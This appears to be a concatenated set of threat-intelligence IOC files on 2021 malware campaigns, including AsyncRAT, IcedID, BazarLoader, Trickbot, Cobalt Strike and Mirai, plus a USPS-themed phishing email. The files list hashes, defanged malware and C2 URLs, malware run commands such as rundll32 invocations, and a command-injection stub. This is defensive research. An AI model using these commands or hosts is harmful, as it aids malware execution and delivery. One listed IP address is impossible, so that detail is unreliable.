Received: from se4p-iad1.servconfig.com ([199.250.217.29]) 6 | by [recipient's mail server] with SMTP (Postfix) 7 | for [recipient's email address]; 8 | Thu, 15 Apr 2021 14:03:28 +0000 (UTC) 9 | Received: from ecres227.servconfig.com ([198.46.81.27]) 10 | by se4-iad1.servconfig.com with esmtps (TLSv1.2:AES128-GCM-SHA256:128) 11 | (Exim 4.92) 12 | (envelope-from ) 13 | id 1lX2ZV-000UqZ-Cu; Thu, 15 Apr 2021 10:02:40 -0400 14 | Received: from [::1] (port=56526 helo=ecres227.servconfig.com) 15 | by ecres227.servconfig.com with esmtpa (Exim 4.94) 16 | (envelope-from ) 17 | id 1lX2YZ-006Q02-DF; Thu, 15 Apr 2021 10:01:19 -0400 18 | Date: Thu, 15 Apr 2021 15:00:57 +0100 19 | From: Lally Kim 20 | To: undisclosed-recipients:; 21 | Subject: Re: PO 439531 22 | 23 | LINK FROM THE EMAIL: 24 | 25 | - hxxps://www.icloud[.]com/iclouddrive/0y1w8aFedVPKnAChlDh74q1KA#P.O%5FFwd_Please_Quote_PO-_PN.pdf 26 | 27 | EXAMPLE OF URL GENERATED BY DOWNLOAD BUTTON FROM ICLOUD PAGE: 28 | 29 | - hxxps://cvws.icloud-content[.]com/B/AXOikGN3oc5WAUAGZzNkMdi23pQ-AVchIErgLqymaw4RhiA0hDjMY8d0/P.O_Fwd%20Please%20Quote%20PO-%20PN.pdf.vbs?o=AvzyZUU9GdhpHVUGh19IdH2ZUwGGR6byEYBd4Fn4FkAi&v=1&x=3&a=CAogDzqsgCF7VJVM7FrbFFhtMjha4Pg2xkQIHr2GuHMtGxkSbxCMx-CvjS8YjKS8sY0vIgEAUgS23pQ-WgTMY8d0aidINkqvFGxQ2fS2aE6tM_gcTuok98BYPIJBF7CnRDYaGrVynSrMIxdyJ2U3oImUdrSTKcYDkvfFQhsQfnemAHYOdq1mV7Yi6KK09xOFmrXPgA&e=1618501112&fl=&r=728fabb0-ddb5-49de-9dc4-421c25a9ef49-1&k=j9MouszrGKnqm3G-G8uHuA&ckc=com.apple.clouddocs&ckz=com.apple.CloudDocs&p=20&s=iXtyJgVpxnSJK0ZapnJ_zuSf3fY&%20=29b68b60-44d3-4d82-8672-0aed6659043e 30 | 31 | DOWNLOADED MALWARE VBS FILE: 32 | 33 | - SHA256 hash: 3822efcf4cc76e1e0e8855d9f9c9ab5c236e118bf14fb004a9f048aa845de967 34 | - File size: 138,719 bytes 35 | - File name: P.O_Fwd Please Quote PO- PN.pdf.vbs 36 | - File description: VBS installer for Async RAT 37 | 38 | POWERSHELL SCRIPT FOR ASYNC RAT: 39 | 40 | - SHA256 hash: 323a3dc7c54ac8653019de489d1411647d0a5c486d4cde836fa03fbab852be79 41 | - File size: 96,744 bytes 42 | - File location: C:\Users\[username]\AppData\Roaming\Temp\SysTray.PS1 43 | - File description: Powershell script for Async RAT 44 | - Note: This is run through a Windows shortcut in the startup menu. 45 | 46 | IP ADDRESSES, TCP PORTS, AND DOMAINS ASSOCIATED WITH THIS ASYNCRAT MALWARE SAMPLE: 47 | 48 | - 5.62.58[.]11 port 8989 - Asin8989.ddns[.]net 49 | - 5.62.58[.]11 port 8988 - asin8988.ddns[.]net 50 | - 79.134.225[.]119 port 8989 - Asin8989.ddns[.]net 51 | - 79.134.225[.]119 port 8988 - asin8988.ddns[.]net 52 | - 197.210.71[.]132 port 8989 - Asin8989.ddns[.]net 53 | - 197.210.71[.]132 port 8988 - asin8988.ddns[.]net 54 | - 5.62.56[.]39 port 8988 - asin8988.ddns[.]net 55 | - 5.62.56[.]39 port 8989 - Asin8989.ddns[.]net 56 | - 5.62.56[.]37 port 8988 - asin8988.ddns[.]net 57 | - 5.62.56[.]37 port 8989 - Asin8989.ddns[.]net -------------------------------------------------------------------------------- /2021-04-26-IcedID-with-Cobalt-Strike-IOCs.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-04-26-IcedID-with-Cobalt-Strike-IOCs.txt -------------------------------------------------------------------------------- /2021-04-26-IcedID-with-Cobalt-Strike-malware-and-artifacts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-04-26-IcedID-with-Cobalt-Strike-malware-and-artifacts.zip -------------------------------------------------------------------------------- /2021-04-26-IcedID-with-Cobalt-Strike-traffic.pcap.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-04-26-IcedID-with-Cobalt-Strike-traffic.pcap.zip -------------------------------------------------------------------------------- /2021-05-10-IOCs-for-TA551-pushing-IcedID.txt: -------------------------------------------------------------------------------- 1 | 2021-05-10 (MONDAY) - TA551 (SHATHAK) WORD DOC PUSHES ICEDID (BOKBOT) 2 | 3 | LINK TO MALWARE SAMPLES: 4 | 5 | - https://github.com/pan-unit42/tweets/blob/master/2021-05-10-TA551-IcedID-malware-and-artifacts.zip 6 | 7 | CHAIN OF EVENTS: 8 | 9 | malspam --> password-protected ZIP archive --> extracted Word doc --> enable macros --> initial DLL --> follow-up binary used in gziploader process --> IcedID DLL and follow-up C2 activity 10 | 11 | REFERENCE: 12 | 13 | - https://www.binarydefense.com/icedid-gziploader-analysis/ 14 | 15 | ASSOCIATED MALWARE: 16 | 17 | - SHA256 hash: ad0df2dfd749f0d84f7fc56204e1001307183575ebb488d99fcf4da7a46a8ef6 18 | - File size: 47,659 bytes 19 | - File name: input-05.010.2021.doc 20 | - File description: malicious Word doc with macros for IcedID 21 | 22 | - SHA256 hash: 5c66856fbf859169f1788c63a788e09e003219ace7142ed0a3244d36cac2d008 23 | - File size: 52,824 bytes 24 | - File location: hxxp://policearellanoz[.]com/dgsos/hPpvERy/xaH0HecVHbhNn1wk5c1LEGmNqWEEfXu3tbWeWACS/zuz2?time=smx0I8sp&=bombw1eGaN3ykyPpIE0lxVzVyIXgWS&=KD5hanf9uOyixXA&eqJKEGY5=rlydjAsOmUGoc0&q=8UW7Z5lTNXBOgQd0DB82ByQ0pziw&XFQDO2rSjJ=xrkrYFWM1W8u2K2&4elNlNrKy=L2aWxu9d&q=fOPCCgSxr1uIiPZBhUea0YzTxePJtp&cid=I0btT6cd9veKcyJ9f6E22tuuNxc7&time=ZvyBHpHKm 25 | - File location: C:\ProgramData\linkABuffer.jpg 26 | - File description: Initial DLL acting as loader for IcedID 27 | - Run method: rundll32 c:\programdata\linkABuffer.jpg,PluginInit 28 | 29 | - SHA256 hash: b35e993d9a9bb9f8f7e0a38cceba7e8808480e701fa7a723e9294446acb4ea0f 30 | - File size: 376,158 bytes 31 | - File location: hxxp://dupperawergo[.]top/ 32 | - File description: Fake gzip binary used in gziploader process to install IcedID 33 | 34 | - SHA256 hash: 29d2a8344bd725d7a8b43cc77a82b3db57a5226ce792ac4b37e7f73ec468510e 35 | - File size: 341,098 bytes 36 | - File location: C:\Users\system.administrator\AppData\Roaming\BrightBike\license.dat 37 | - File description: encoded binary used to run IcedID DLL listed below. 38 | 39 | - SHA256 hash: bdfd7e4b148540b06cb722de7072d04381d2a3a90dcdc1cd51fe5bd16fdd8b10 40 | - File size: 34,304 bytes 41 | - File location: C:\Users\[username]\AppData\Local\Azad\qahaumsp.dll 42 | - File description: IcedID DLL persistent on infected Windows host 43 | - Run method: rundll32.exe "C:\Users\[username]\AppData\Local\Azad\qahaumsp.dll",update /i:"BrightBike\license.dat" 44 | 45 | TRAFFIC CAUSED BY ENABLING MACROS ON WORD DOC: 46 | 47 | - 45.142.215[.]173 port 80 - policearellanoz[.]com - GET /dgsos/hPpvERy/xaH0HecVHbhNn1wk5c1LEGmNqWEEfXu3tbWeWACS/zuz2?time=smx0I8sp&=bombw1eGaN3ykyPpIE0lxVzVyIXgWS&=KD5hanf9uOyixXA&eqJKEGY5=rlydjAsOmUGoc0&q=8UW7Z5lTNXBOgQd0DB82ByQ0pziw&XFQDO2rSjJ=xrkrYFWM1W8u2K2&4elNlNrKy=L2aWxu9d&q=fOPCCgSxr1uIiPZBhUea0YzTxePJtp&cid=I0btT6cd9veKcyJ9f6E22tuuNxc7&time=ZvyBHpHKm 48 | 49 | TRAFFIC CAUSED BY INSTALLER DLL: 50 | 51 | - port 443 - aws.amazon.com - HTTPS traffic 52 | - 194.5.249[.]103 port 80 - dupperawergo[.]top - GET / 53 | 54 | ICEDID C2 TRAFFIC: 55 | 56 | - 83.97.20[.]254 port 443 - zasatava[.]top - IcedID C2 HTTPS traffic 57 | - 83.97.20[.]254 port 443 - defliressisto[.]top - IcedID C2 HTTPS traffic 58 | - 83.97.20[.]254 port 443 - luppotuppo[.]top - IcedID C2 HTTPS traffic 59 | -------------------------------------------------------------------------------- /2021-05-10-TA551-IcedID-malware-and-artifacts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-05-10-TA551-IcedID-malware-and-artifacts.zip -------------------------------------------------------------------------------- /2021-05-17-TA551-IcedID-malware-and-artifacts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2021-05-17-TA551-IcedID-malware-and-artifacts.zip -------------------------------------------------------------------------------- /2021-06-07-Mirai-IOCs.md: -------------------------------------------------------------------------------- 1 | IOCs 2 | 3 | | URL | SHA-256 | 4 | |:-------------:|------:| 5 | | 212[.]192.241.72/bins/dark.arm5 | 4b745539ee696697a465a86a8f9f70d89c35ddbeef0a0f3244e2d3fe65b43b01 | 6 | | 212[.]192.241.72/bins/dark.arm5 | fd22a14e31f6675c50b5c57fdaa09fcf466a39b2eb6fccb546c419aa4064a96d | 7 | | 212[.]192.241.72/bins/dark.arm6 | 03ba8eaacbff2ae82b2f834b47fc055127733116eb7ed6a95fc3cbfa243135ef | 8 | | 212[.]192.241.72/bins/dark.arm6 | 9df3df2e35a6ebc669dc84a04dc8ceacd26ac2d92e3358061448a0d69d1c0b03 | 9 | | 212[.]192.241.72/bins/dark.arm7 | 75612082a5eb445067fc4e8ba155b13d07786930e1f1528ded4228294ff84c0d | 10 | | 212[.]192.241.72/bins/dark.arm7 | e93b82e208d59b4d3655437a124fc48045e90897a5854c2f9b77cca909c7b1d0 | 11 | | 212[.]192.241.72/bins/dark.m68k | b15a302c698a454548c42c144a23da4435db2423100416adfb52bd75794dce01 | 12 | | 212[.]192.241.72/bins/dark.m68k | c22292b2a99aa62865bdcb961be4ca9d4605c04359373af5122693265d7664fc | 13 | | 212[.]192.241.72/bins/dark.mips | 04d2b1479280a2633f570d36645a0d9a79ec4082d9a45d371a46dcf02e40866f | 14 | | 212[.]192.241.72/bins/dark.mips | 8b028d9bba07127393e17147420348012000cf1b877d4e9544476ac7d23921af | 15 | | 212[.]192.241.72/bins/dark.mpsl | 2f3a427e041122bdb02364b0a15568262dfc27a509f4962fe5a334cc872863e1 | 16 | | 212[.]192.241.72/bins/dark.mpsl | 701e8e574a0dd36e0c28628721496a57a48f94e49a60b354520f7127da76b6f1 | 17 | | 212[.]192.241.72/bins/dark.ppc | 25fcefa76d1752b40b33f353332ddb48b3bae529f0af24347ffeffc5e1acd5cd | 18 | | 212[.]192.241.72/bins/dark.ppc | e27d03679f4dc02cc32230c782ed6883af0086220817bf0d4578e5aa0ffc43c2 | 19 | | 212[.]192.241.72/bins/dark.sh4 | 1eeddcaa24d935c4d5463b46902726e4d23c6746493c5734b693bae71b6b613a | 20 | | 212[.]192.241.72/bins/dark.spc | 30aacb60ab0c7f0440d166bd7993d576ef37b0ee8ecd71a707f57be29d9b75e4 | 21 | | 212[.]192.241.72/bins/dark.x86 | 08efaafd5ca09611ecde73d48a4f3eef20e55c715c0d6a1e9f4c274c31e75ee5 | 22 | | 212[.]192.241.72/bins/dark.x86 | 483f452d2ccf44866dbb42a7cf5213a666eed57b6e78fca8db32861452f94cb2 | 23 | 24 | Vulnerabilities targeted : 25 | * CVE-2021-1497 Cisco HyperFlex HX Command Injection 26 | 27 | * Unidentified vulnerability 28 | ``` 29 | GET enable=aaa;[payload] 30 | ``` 31 | 32 | * CVE-2021-31755 Tenda AC11 Router RCE 33 | 34 | * OptiLink ONT1GEW GPON Router RCE 35 | 36 | * CVE-2009-4487 nginx 0.7.64 Terminal Escape Sequence in Logs Command Injection 37 | 38 | * CVE-2020-28188 TerraMaster TOS RCE 39 | 40 | * CVE-2020-26919 Netgear ProSAFE RCE 41 | 42 | * CVE-2021-25502 Micro Focus Operation Bridge Reporter (OBR) RCE 43 | 44 | * Unidentified vulnerability previously seen and reported [here](https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/) 45 | 46 | * CVE-2020-25506 D-Link DNS-320 Firewall RCE 47 | 48 | * VisualDoor SonicWall SSL-VPN RCE 49 | 50 | * CVE-2021-27561 & CVE-2021-27562 Yealink Device Management Pre-Auth ‘root’ Level RCE 51 | 52 | Previous Research on the same variant : https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ 53 | -------------------------------------------------------------------------------- /2021-07-20-IOCs-for-BazarLoader-and-Trickbot.txt: -------------------------------------------------------------------------------- 1 | 2021-07-20 (TUESDAY) - BAZARLOADER FROM STOLEN IMAGES EVICENCE.ZIP 2 | 3 | CHAIN OF EVENTS: 4 | 5 | - Email --> Link --> Stolen Images Evidence.zip --> Stolen Images Evidence.js --> BazarLoader DLL --> Bazar C2 traffic --> Trickbot gtag mod8 6 | 7 | ASSOCIATED MALWARE: 8 | 9 | - SHA256 hash: 11f4063c74834acada62284c1c3d5bacf4aebb82cae57e2d07fb7477f1fc4be7 10 | - File size: 6,110 bytes 11 | - File name: Stolen Images Evidence.zip 12 | - File description: Downloaded ZIP archive from link in email 13 | 14 | - SHA256 hash: 99b33d046b950bfe1d39e73d6ca0a1c071a0653b979094a8680da8ad22604e90 15 | - File size: 21,572 bytes 16 | - File name: Stolen Images Evidence.js 17 | - File description: JS file extracted from downloaded ZIP archive 18 | 19 | - SHA256 hash: 82c4c174ad1822ac3c1a55b2e08e9987a9be2294f46508318e50f70566beab5c 20 | - File size: 1,091,079 bytes 21 | - File location: hxxp://menoiras[.]space/222g100/main.php 22 | - File location: C:\Users\[username]\AppData\Roaming\Temp\DRQxZrK.dat 23 | - File description: BazarLoader DLL retreived by Stolen Images Evidence.js 24 | - Run method: rundll32.exe [filename],StartW 25 | 26 | - SHA256 hash: 8eb708fb8f044596b841b47c2d75f6c02f878f5685b75008084c70752b961d15 27 | - File size: 380,928 bytes 28 | - File location: C:\Users\[username]\AppData\Local\Temp\59FC.dll 29 | - File location: C:\Users\[username]\AppData\Roaming\aeygwtpv.nao 30 | - File description: Trickbot as follow-up malware from BazarLoader infection (gtag mod8) 31 | - Run method: rundll32.exe [filename],StartW 32 | 33 | - SHA256 hash: ade2a738f75f052722923641168d0b3862981e0dd23b31834c1520123a73be49 34 | - File size: 655,360 bytes 35 | - File location: C:\Users\[username]\AppData\Local\Temp\DDA9.dll 36 | - File description: Another binary for Trickbot as follow-up malware from BazarLoader infection (gtag mod8) 37 | - Run method: rundll32.exe [filename],StartW 38 | 39 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 40 | 41 | STOLEN IMAGES EVIDENCE.JS RETRIEVES BAZARLOADER DLL: 42 | 43 | - 104.21.8[.]76 port 80 - hxxp://menoiras[.]space/222g100/index.php 44 | - 104.21.8[.]76 port 80 - hxxp://menoiras[.]space/222g100/main.php 45 | 46 | BAZAR C2 TRAFFIC: 47 | 48 | - 3.16.22[.]120 port 443 - hxxps://twenzim[.]com/www/html/generic 49 | - 3.233.192[.]20 port 443 - hxxps://saltraw[.]com/www/html/generic 50 | 51 | TRICKBOT C2 TRAFFIC: 52 | 53 | - port 443 - ident.me - IP address check (not inherently malicious) 54 | - 103.105.254.17 port 443 - HTTPS traffic 55 | - 190.144.10.242 port 443 - HTTPS traffic 56 | - 194.135.33.220 port 443 - 194.135.33.220:443 - POST /mod8/[string identifying infected host/83/ 57 | - 94.140.114.239 port 443 - 94.140.114.239:443 - POST /mod8/[string identifying infected host/83/ 58 | - 194.15.113.73 port 443 - 194.15.113.73:443 - POST /mod8/[string identifying infected host/83/ 59 | - 5.181.80.128 port 443 - 5.181.80.128:443 - POST /mod8/[string identifying infected host/83/ 60 | - 45.86.65.164 port 443 - 45.86.65.164:443 - POST /mod8/[string identifying infected host/83/ 61 | -------------------------------------------------------------------------------- /2021-07-26-Trickbot-gtag-rob112.txt: -------------------------------------------------------------------------------- 1 | 2021-07-26 (MONDAY) - TRICKBOT GTAG ROB112 2 | 3 | EMAIL HEADERS: 4 | 5 | - Received: from o2.p8.mailjet.com ([87.253.233.2]) [info removed]; Mon, 26 Jul 2021 10:34:34 -0700 6 | - Subject: Order Confirmation 83864 7 | - Date: Mon, 26 Jul 2021 18:34:18 +0100 8 | - Message-Id: <01b809de.AMwAAKoqBuIAAAAAAAAAALKImNcAAR0rOK4AAAAAAAZC2QBg_vIj@mailjet.com> 9 | 10 | ASSOCIATED MALWARE: 11 | 12 | - SHA256 hash: 8f421ddf0df678fe1c22460e0fa3a10c7c48112197917e3843c5674ffe429503 13 | - File size: 741,635 bytes 14 | - File name: details_5908.zip 15 | - File description: Malicious ZIP archive attached to email 16 | 17 | - SHA256 hash: 7559493fd22c60217b62790fa4576988396967b597cade92f288ef39335bee3b 18 | - File size: 1,231,703 bytes 19 | - File name: details_5908.js 20 | - File description: Malicious JS file retrieved from above ZIP archive 21 | 22 | - SHA256 hash: 6e057855e21f4c93a4e3825b9711ca07ccec94fed55dbc20e1d3316b2b3dc549 23 | - File size: 632,320 bytes 24 | - File location: hxxps://docs.zohopublic[.]eu/downloaddocument.do?docId=674ni225458b03d204b4ab290dc0afd57ec8c&docExtn=pdf 25 | - File location: C:\Users\[username]\AppData\Local\Temp\wfhG.bin 26 | - File location: C:\Users\[username]\AppData\Roaming\wise-toolsZ7RZBV\hbwfhGzt.grf 27 | - File description: DLL for Trickbot gtag rob112 28 | - Run method: Rundll32.exe [filename],StartW 29 | 30 | INFECTION TRAFFIC: 31 | 32 | - 192.185.150[.]20 port 80 - hxxp://netvalleykenya[.]com/crm.php 33 | - 213.244.146[.]19 port 443 - hxxps://docs.zohopublic[.]eu/downloaddocument.do?docId=674ni225458b03d204b4ab290dc0afd57ec8c&docExtn=pdf 34 | - 38.110.103[.]18 port 443 - hxxps://38.110.103[.]18/rob112/[long string] 35 | - 38.110.103[.]19 port 443 - hxxps://38.110.103[.]19/rob112/[long string] 36 | - 38.110.100[.]33 port 443 - hxxps://38.110.100[.]33/rob112/[long string] 37 | - 38.110.103[.]124 port 443 - hxxps://38.110.103[.]124/rob112/[long string] 38 | - 38.110.103[.]136 port 443 - hxxps://38.110.103[.]136/rob112/[long string] 39 | - 80.15.2[.]105 port 443 - hxxps://80.15.2[.]105/rob112/[long string] 40 | - 94.140.114[.]239 port 443 - hxxp://94.140.114[.]239:443/rob112/[long string] 41 | - 190.144.10[.]242 port 443 - hxxps://190.144.10[.]242/rob112/[long string] 42 | - 194.135.33[.]220 port 443 - hxxp://194.135.33[.]220:443/rob112/[long string] 43 | -------------------------------------------------------------------------------- /2021-07-29-IOCs-for-BazarLoader-CobaltStrike-PrintNightmare.txt: -------------------------------------------------------------------------------- 1 | 2021-07-29 (THURSDAY) - STOLEN IMAGES EVIDENCE.ZIP --> BAZARLOADER --> COBALT STRIKE --> PRINTNIGHTMARE 2 | 3 | NOTES: 4 | 5 | - We have evidence of this campaign starting as early as November 2020. 6 | 7 | - This campaign previously pushed IcedID (Bokbot) malware as described here: 8 | https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/ 9 | 10 | - This campaign switched to from IcedID and began pushing BazarLoader in early July 2021. Reference: 11 | https://twitter.com/malware_traffic/status/1412470165179092992 12 | 13 | - We continue to see BazarLoader from this campaign followed with Cobalt Strike, which can lead to other malicious activity as seen here. 14 | 15 | CHAIN OF EVENTS: 16 | 17 | - Email --> Link --> Stolen Images Evidence.zip --> Stolen Images Evidence.js --> BazarLoader DLL --> Bazar C2 traffic --> Cobalt Strike --> follow-up malware including PrintNightmare 18 | 19 | DOWNLOADED ZIP AND EXTRACTED .JS FILE: 20 | 21 | - b2a996a9301cdb9f19dec6105880aa5530758cc29347c389de48c15728cad25d Stolen Images Evidence.zip 22 | - 88d4d3f48bd23543980b70b5a78606d80c2917bfcd960991eb9a8ddf6ac58ed2 Stolen Images Evidence.js 23 | 24 | BAZARLOADER DLL: 25 | 26 | - SHA256 hash: 37065b2a4cdaec2b1a260b39738746cb45895bd6d508e7aa5e4013e94abc6196 27 | - Location: C:\Users\[username]\AppData\Local\Temp\miFrRGoM.dat 28 | - Run method: rundll32.exe [filename],StartW 29 | 30 | COBALT STRIKE BINARIES: 31 | 32 | - SHA256 hash: bab8196c3630b25a0dc1c21303881e0dc4d1f560655b7f86e6986c9eb84ae946 33 | - Location: C:\Users\[username]\Downloads\162_64.exe 34 | 35 | - SHA256 hash: 087153ed5bb9bb9807e37a8fd745a16a634497a842896f232ab4cfb54197ba00 36 | - Location: C:\Users\[username]\Downloads\162_64.dll 37 | - Run method: regsvr32.exe 162_64.dll 38 | 39 | POWERSHELL SCRIPT FOR PRINTNIGHTMARE: 40 | 41 | - SHA256 hash: a1e737140c474872759add27ef45f0d9772fcb32c48aabd82d6d4055ccbfafb9 42 | - Location: C:\Users\[username]\Downloads\1675.ps1 43 | 44 | OTHER FILES MALICIOUS FILES: 45 | 46 | - SHA256 hash: 51ddba2bfdccb9ae4e640ae2fa67594e51cc4303a2e8cefe5afde33cc2a37976 47 | - Location: C:\Users\[username]\Downloads\starterO.exe 48 | 49 | - SHA256 hash: b3af3e97b503df85ee940044eb64ad482698bde256feee054d97879eac53780b 50 | - Location: C:\Users\[username]\Downloads\starterOF.exe 51 | 52 | TRAFFIC GENERATED BY STOLEN IMAGES EVIDENCE.JS: 53 | 54 | - 172.67.181[.]157 port 80 - munardis[.]space - GET /222g100/index.php HTTP/1.1 55 | - 172.67.181[.]157 port 80 - munardis[.]space - GET /222g100/main.php HTTP/1.1 56 | 57 | BAZAR C2 TRAFFIC: 58 | 59 | - hxxps://195.123.233[.]106/anchor/south 60 | - hxxps://13.52.241[.]196/anchor/south 61 | 62 | COBALT STRIKE TRAFFIC: 63 | 64 | - 31.14.40[.]172 port 443 - postformt[.]com - Client Hello (HTTPS traffic) 65 | - 162.244.80[.]46 port 80 - loikdo[.]com - GET /components/mt.ico HTTP/1.1 66 | - 162.244.80[.]46 port 80 - loikdo[.]com - GET /copyright.js?terms=false HTTP/1.1 67 | - 162.244.80[.]46 port 80 - loikdo[.]com - POST /xmlconnect HTTP/1.1 (text/plain) 68 | 69 | NOTES: 70 | 71 | - postformt[.]com reported as Cobalt Stike by @mojoesec on 2021-07-20 at: 72 | https://twitter.com/mojoesec/status/1417574273988931585 73 | 74 | - loikdo[.]com reported as Cobalt Stike by @mojoesec on 2021-07-29 at: 75 | https://twitter.com/bryceabdo/status/1420839047426084869 76 | But HTTP traffic patterns also indicate this is Cobalt Strike. -------------------------------------------------------------------------------- /2021-08-09-BazarLoader-and-Cobalt-Strike-IOCs.txt: -------------------------------------------------------------------------------- 1 | 2021-08-09 (MONDAY) - STOLEN IMAGES EVICENCE.ZIP --> BAZARLOADER --> COBALT STRIKE 2 | 3 | CHAIN OF EVENTS: 4 | 5 | Email --> Link --> Stolen Images Evidence.zip --> Stolen Images Evidence.js --> BazarLoader DLL --> Bazar C2 traffic --> Cobalt Strike 6 | 7 | ASSOCIATED MALWARE: 8 | 9 | - SHA256 hash: a0b802b97f4fcdac9f0b4ae27a3623f353890fa4dd8de47aceb82d7612be95da 10 | - File size: 7,077 bytes 11 | - File name: Stolen Images Evidence.zip 12 | - File description: 13 | 14 | - SHA256 hash: 4dae02681b1017f1812bcb4d2a76287b1f4f3c1875ffbd17a8fc0a8b63841a00 15 | - File size: 20,031 bytes 16 | - File name: Stolen Images Evidence.js 17 | - File description: 18 | 19 | - SHA256 hash: 2bd7a2153ce51e2a0e9b1f197c51ee7eab05f5bb46fbaffe53294d18be89969b 20 | - File size: 989,194 bytes 21 | - File location: hxxp://vagenor[.]space/333g100/main.php 22 | - File location: C:\Users\[username]\AppData\Local\Temp\RyqXLe.dat 23 | - File description: Malware DLL for BazarLoader (BazaLoader) 24 | - Run method: rundll32.exe [filename],StartW 25 | 26 | - SHA256 hash: 6eccc2f0b5fb42a7b59881acdef621cc086d6ab76dfd80e5a3b3542590197805 27 | - File size: 475,648 bytes 28 | - File location: C:\Users\[username]\AppData\Local\Temp\E5A2.dll 29 | - File description: Malware DLL for Cobalt Strike 30 | - Run method: rundll32.exe [filename],Entrypoint 31 | 32 | 33 | TRAFFIC GENERATED BY EXTRACTED .JS FOR BAZARLOADER DLL: 34 | 35 | - 172.67.128[.]34 port 80 - hxxp://vagenor[.]space/333g100/index.php 36 | - 172.67.128[.]34 port 80 - hxxp://vagenor[.]space/333g100/main.php 37 | 38 | BAZAR C2 TRAFFIC: 39 | 40 | - hxxps://161.35.144[.]15/issue/web 41 | - hxxps://161.35.152[.]48/issue/web 42 | 43 | COBALT STRIKE TRAFFIC: 44 | 45 | - 23.82.19[.]173 port 443 - yuxicu[.]com - HTTPS traffic 46 | - 23.106.215[.]61 port 443 - gojihu[.]com - HTTPS traffic -------------------------------------------------------------------------------- /2021-08-18-phishing-example.txt: -------------------------------------------------------------------------------- 1 | 2021-08-18 - PHISHING EMAIL SPOOFING US POSTAL SERVICE 2 | 3 | EMAIL HEADERS: 4 | 5 | Received: from hosting.swin.net.id ([103.11.134.180]) 6 | by [recipient's mail server] with SMTP (Postfix) 7 | for [recipient's email address]; 8 | Wed, 18 Aug 2021 14:44:03 +0000 (UTC) 9 | Received: from heritage by arjuna.capoeng.net with local (Exim 4.94.2) 10 | (envelope-from ) 11 | id 1mGMnT-00053F-8l 12 | for [recipient's email address]; Wed, 18 Aug 2021 21:44:03 +0700 13 | To: [recipient's email address] 14 | Subject: Your shipment is waiting to be delivered. 15 | Date: Wed, 18 Aug 2021 21:44:03 +0700 16 | From: "USPS.COM" 17 | Content-Type: multipart/alternative; 18 | boundary="b1_2a0b903f0a40c63d0a2965edfd2dfda1" 19 | Content-Transfer-Encoding: 8bit 20 | 21 | LINK FROM MESSAGE TEXT: 22 | 23 | - hxxps://usps-delivery-support.logitel[.]com[.]au/update/ 24 | 25 | NOTES: 26 | 27 | - Link from email is HTTPS, but it worked as an HTTP URL. 28 | - 276.121.68[.]115 - usps-delivery-support.logitel[.]com[.]au 29 | - Most browsers (Chrome/Edge/Firefox) are currently flagging this URL. -------------------------------------------------------------------------------- /2021-08-26-IOCs-for-DDoS-themed-BazarLoader-infection.txt: -------------------------------------------------------------------------------- 1 | 2021-08-26 (THURSDAY) - "DDOS ATTACK PROOF" FORM EMAILS PUSH BAZARLOADER (BAZALOADER) 2 | 3 | NOTES: 4 | 5 | - We have evidence of this campaign starting as early as November 2020. 6 | 7 | - This "Stolen Images Evidence" campaign previoulsy pushed IcedID as described here: https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/ 8 | 9 | - "Stolen Images Evidence" switched from IcedID to BazarLoader by early July 2021: https://twitter.com/malware_traffic/status/1412470165179092992 10 | 11 | - As recently as 2021-08-16, the "Stolen Images Evidence" campaign switched to a "DDoS Attack Proof" theme: https://twitter.com/mesa_matt/status/1430974685110587395 12 | 13 | - Otherwise, "DDoS Attack Proof" follows the same infection patterns as "Stolen Images Evidence" and should be considered the same threat actor. 14 | 15 | 16 | EXAMPLE OF LINK FROM EMAIL: 17 | 18 | - hxxps://sites.google[.]com/view/m93ibv29fub4jr9n3n/drv/folders/shared/f/download?f=094707802844283701 19 | 20 | 21 | ASSOCIATED MALWARE: 22 | 23 | - SHA256 hash: d233d905290c4e9cb05f833b584ed2007fbc68d095a45b386dd078b05f1bde24 24 | - File size: 7,988 bytes 25 | - File name: DDoS attack proof and instructions on how to fix it.zip 26 | - File description: ZIP archive downloaded from link in contact form-generated email 27 | 28 | - SHA256 hash: c205e557970970af8d77cc2189d43eea3eb1f70ddc066201f93ab2134e4d32bd 29 | - File size: 23,241 bytes 30 | - File name: DDoS attack proof and instructions on how to fix it.js 31 | - File description: JavaScript file extracted from above ZIP archive 32 | 33 | - SHA256 hash: 8ea46ac64f5af7bb295a8b784738fc11fc0fde1543d7da43c0f97f88950185c4 34 | - File size: 481,809 bytes 35 | - File location: hxxp://manioris[.]space/333g100/main.php 36 | - File location: C:\Users\[username]\AppData\Local\Temp\StNsbaY.dat 37 | - File description: BazarLoader DLL 38 | - Run method: rundll32.exe [filename],StartW 39 | 40 | 41 | MALICIOUS DOMAIN HOSTING INITIAL ZIP ARCHIVE: 42 | 43 | - 172.67.217[.]206 port 443 - bunadrex[.]space 44 | 45 | JS RETREIVING THE BAZARLOADER DLL: 46 | 47 | - 172.67.208[.]70 port 80 - manioris[.]space - GET /333g100/index.php 48 | - 172.67.208[.]70 port 80 - manioris[.]space - GET /333g100/main.php 49 | 50 | BAZAR C2: 51 | 52 | - 94.140.112[.]22 port 443 - hxxps://94.140.112[.]22/out/minor/issue/invoke 53 | - port 443 - hxxps://microsoft[.]com/telemetry/update.exe (not inherently malicious) 54 | - port 443 - hxxps://www.microsoft[.]com/telemetry/update.exe (not inherently malicious) 55 | - 139.28.235[.]249 port 443 - hxxps://139.28.235[.]249/out/minor/issue/invoke 56 | - 172.83.155[.]231 port 443 - hxxps://172.83.155[.]231/out/minor/issue/invoke 